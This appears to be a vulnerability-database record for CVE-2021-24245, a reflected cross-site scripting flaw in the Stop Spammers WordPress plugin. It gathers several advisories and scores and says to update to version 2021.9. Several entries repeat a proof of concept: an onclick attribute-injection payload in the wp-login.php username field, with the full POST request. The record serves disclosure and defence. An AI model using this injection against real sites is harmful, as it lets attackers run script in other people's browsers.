Stop Spammers < 2021.9 - Reflected Cross-Site Scripting (XSS)

2021-04-08T00:00:00

Description

The plugin did not escape user input when blocking requests (such as matching a spam word), outputting it in an attribute after sanitising it to remove HTML tags, which is not sufficient and lead to a reflected Cross-Site Scripting issue.

{"id": "WPEX-ID:5E7ACCD6-08DC-4C6E-9D19-73E2D7E97735", "type": "wpexploit", "bulletinFamily": "exploit", "title": "Stop Spammers < 2021.9 - Reflected Cross-Site Scripting (XSS)", "description": "The plugin did not escape user input when blocking requests (such as matching a spam word), outputting it in an attribute after sanitising it to remove HTML tags, which is not sufficient and lead to a reflected Cross-Site Scripting issue.\n", "published": "2021-04-08T00:00:00", "modified": "2021-04-09T07:00:52", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "", "reporter": "Hosein vita", "references": ["https://plugins.trac.wordpress.org/changeset/2509620/"], "cvelist": ["CVE-2021-24245"], "immutableFields": [], "lastseen": "2021-05-14T11:33:04", "viewCount": 115, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0303"]}, {"type": "cve", "idList": ["CVE-2021-24245"]}, {"type": "exploitdb", "idList": ["EDB-ID:49880"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162623"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:5E7ACCD6-08DC-4C6E-9D19-73E2D7E97735"]}, {"type": "zdt", "idList": ["1337DAY-ID-36267"]}], "rev": 4}, "score": {"value": 4.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0303"]}, {"type": "cve", "idList": ["CVE-2021-24245"]}, {"type": "exploitdb", "idList": ["EDB-ID:49880"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162623"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:5E7ACCD6-08DC-4C6E-9D19-73E2D7E97735"]}, {"type": "zdt", "idList": ["1337DAY-ID-36267"]}]}, "exploitation": null, "vulnersScore": 4.2}, "sourceData": "From an IP not in the Allow List (wp-admin/admin.php?page=ss_allow_list), make a request with a spam word, and add an XSS payload, such as ad\" accesskey=X onclick=alert(1) \"\r\n\r\nAn input such as ad\">TEST can also be used to prove the injection which will result in TEST\" /> being displayed in the page\r\n\r\nThis can be achieved via the wp-login.php form for example, either in the Username or Password fields.\r\n\r\nPOST /wp-login.php HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 148\r\nConnection: close\r\nCookie: wordpress_test_cookie=WP%20Cookie%20check\r\nUpgrade-Insecure-Requests: 1\r\n\r\nlog=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=Log+In&testcookie=1", "generation": 1, "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645893725}}

{"wpvulndb": [{"lastseen": "2021-05-14T11:33:04", "description": "The plugin did not escape user input when blocking requests (such as matching a spam word), outputting it in an attribute after sanitising it to remove HTML tags, which is not sufficient and lead to a reflected Cross-Site Scripting issue.\n\n### PoC\n\nFrom an IP not in the Allow List (wp-admin/admin.php?page=ss_allow_list), make a request with a spam word, and add an XSS payload, such as ad\" accesskey=X onclick=alert(1) \" An input such as ad\">TEST can also be used to prove the injection which will result in TEST\" /> being displayed in the page This can be achieved via the wp-login.php form for example, either in the Username or Password fields. POST /wp-login.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 148 Connection: close Cookie: wordpress_test_cookie=WP%20Cookie%20check Upgrade-Insecure-Requests: 1 log=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd;=&wp-submit;=Log+In&testcookie;=1\n", "cvss3": {}, "published": "2021-04-08T00:00:00", "type": "wpvulndb", "title": "Stop Spammers < 2021.9 - Reflected Cross-Site Scripting (XSS)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-24245"], "modified": "2021-04-09T07:00:52", "id": "WPVDB-ID:5E7ACCD6-08DC-4C6E-9D19-73E2D7E97735", "href": "https://wpscan.com/vulnerability/5e7accd6-08dc-4c6e-9d19-73e2d7e97735", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:34:28", "description": "A cross site scripting vulnerability exists in WordPress Stop Spammers plugin. Successful exploitation of this vulnerability would allow remote attackers to inject an arbitrary web script into the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-06-01T00:00:00", "type": "checkpoint_advisories", "title": "WordPress Stop Spammers Plugin Cross Site Scripting (CVE-2021-24245)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24245"], "modified": "2021-06-01T00:00:00", "id": "CPAI-2021-0303", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "zdt": [{"lastseen": "2021-11-08T14:24:01", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-05-19T00:00:00", "type": "zdt", "title": "WordPress Stop Spammers 2021.8 Plugin - (log) Reflected Cross-site Scripting Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24245"], "modified": "2021-05-19T00:00:00", "id": "1337DAY-ID-36267", "href": "https://0day.today/exploit/description/36267", "sourceData": "# Exploit Title: WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS)\n# Exploit Author: Hosein Vita\n# Vendor Homepage: https://wordpress.org/plugins/stop-spammer-registrations-plugin/\n# Software Link: https://downloads.wordpress.org/plugin/stop-spammer-registrations-plugin.zip\n# Version: <= 2021.8\n# Tested on: Windows-Ubuntu\n# CVE : CVE-2021-24245\n\nSummary:\n\nReflected cross-site scripting (XSS) vulnerabilities in 'Stop Spammers <= 2021.8' allow remote attackers to run arbitary javascript\n\nProof of concepts:\n\n1-Install \"Stop Spammers <= 2021.8\" in your wordpress website\n2-For testing remove your IP address from the allowed list\n3-Go to http://<YOUR-WEBSITE>/wp-admin\n4-In username field enter this payload ~> ad\" accesskey=X onclick=alert(1) \"\n#Notice the `ad` keyword must be in your payload!\n5-Press Alt + Shift + X to trigger Xss\n#Tested on Firefox\n\nRequest POC:\n\nPOST /wp-login.php HTTP/1.1\nHost: localhost\nConnection: close\nContent-Length: 161\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: wordpress_test_cookie=WP+Cookie+check;\n\nlog=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1\n", "sourceHref": "https://0day.today/exploit/36267", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2022-03-23T14:50:11", "description": "The Stop Spammers WordPress plugin before 2021.9 did not escape user input when blocking requests (such as matching a spam word), outputting it in an attribute after sanitising it to remove HTML tags, which is not sufficient and lead to a reflected Cross-Site Scripting issue.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2021-24245", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24245"], "modified": "2021-05-26T19:35:00", "cpe": [], "id": "CVE-2021-24245", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24245", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "packetstorm": [{"lastseen": "2021-05-19T14:32:32", "description": "", "cvss3": {}, "published": "2021-05-19T00:00:00", "type": "packetstorm", "title": "WordPress Stop Spammers 2021.8 Cross Site Scripting", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-24245"], "modified": "2021-05-19T00:00:00", "id": "PACKETSTORM:162623", "href": "https://packetstormsecurity.com/files/162623/WordPress-Stop-Spammers-2021.8-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS) \n# Date: 04/08/2021 \n# Exploit Author: Hosein Vita \n# Vendor Homepage: https://wordpress.org/plugins/stop-spammer-registrations-plugin/ \n# Software Link: https://downloads.wordpress.org/plugin/stop-spammer-registrations-plugin.zip \n# Version: <= 2021.8 \n# Tested on: Windows-Ubuntu \n# CVE : CVE-2021-24245 \n \nSummary: \n \nReflected cross-site scripting (XSS) vulnerabilities in 'Stop Spammers <= 2021.8' allow remote attackers to run arbitary javascript \n \nProof of concepts: \n \n1-Install \"Stop Spammers <= 2021.8\" in your wordpress website \n2-For testing remove your IP address from the allowed list \n3-Go to http://<YOUR-WEBSITE>/wp-admin \n4-In username field enter this payload ~> ad\" accesskey=X onclick=alert(1) \" \n#Notice the `ad` keyword must be in your payload! \n5-Press Alt + Shift + X to trigger Xss \n#Tested on Firefox \n \nRequest POC: \n \nPOST /wp-login.php HTTP/1.1 \nHost: localhost \nConnection: close \nContent-Length: 161 \nUpgrade-Insecure-Requests: 1 \nContent-Type: application/x-www-form-urlencoded \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nCookie: wordpress_test_cookie=WP+Cookie+check; \n \nlog=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1 \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162623/wpstopspammers20218-xss.txt", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "patchstack": [{"lastseen": "2022-06-01T19:32:49", "description": "Reflected Cross-Site Scripting (XSS) vulnerability discovered by Hosein_vita in WordPress Stop Spammers plugin (versions <= 2021.8).\n\n## Solution\n\n\r\n Update the WordPress Stop Spammers plugin to the latest available version (at least 2021.9).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-04-08T00:00:00", "type": "patchstack", "title": "WordPress Stop Spammers plugin <= 2021.8 - Reflected Cross-Site Scripting (XSS) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24245"], "modified": "2021-04-08T00:00:00", "id": "PATCHSTACK:72442C545D566B6B90B55456E1E30C1F", "href": "https://patchstack.com/database/vulnerability/stop-spammer-registrations-plugin/wordpress-stop-spammers-plugin-2021-8-reflected-cross-site-scripting-xss-vulnerability", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2022-01-13T05:29:16", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-05-19T00:00:00", "type": "exploitdb", "title": "WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24245", "2021-24245"], "modified": "2021-05-19T00:00:00", "id": "EDB-ID:49880", "href": "https://www.exploit-db.com/exploits/49880", "sourceData": "# Exploit Title: WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS)\r\n# Date: 04/08/2021\r\n# Exploit Author: Hosein Vita\r\n# Vendor Homepage: https://wordpress.org/plugins/stop-spammer-registrations-plugin/\r\n# Software Link: https://downloads.wordpress.org/plugin/stop-spammer-registrations-plugin.zip\r\n# Version: <= 2021.8\r\n# Tested on: Windows-Ubuntu\r\n# CVE : CVE-2021-24245\r\n\r\nSummary:\r\n\r\nReflected cross-site scripting (XSS) vulnerabilities in 'Stop Spammers <= 2021.8' allow remote attackers to run arbitary javascript\r\n\r\nProof of concepts:\r\n\r\n1-Install \"Stop Spammers <= 2021.8\" in your wordpress website\r\n2-For testing remove your IP address from the allowed list\r\n3-Go to http://<YOUR-WEBSITE>/wp-admin\r\n4-In username field enter this payload ~> ad\" accesskey=X onclick=alert(1) \"\r\n#Notice the `ad` keyword must be in your payload!\r\n5-Press Alt + Shift + X to trigger Xss\r\n#Tested on Firefox\r\n\r\nRequest POC:\r\n\r\nPOST /wp-login.php HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\nContent-Length: 161\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCookie: wordpress_test_cookie=WP+Cookie+check;\r\n\r\nlog=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1", "sourceHref": "https://www.exploit-db.com/download/49880", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}

Stop Spammers &lt; 2021.9 - Reflected Cross-Site Scripting (XSS)

Description

Related

Stop Spammers < 2021.9 - Reflected Cross-Site Scripting (XSS)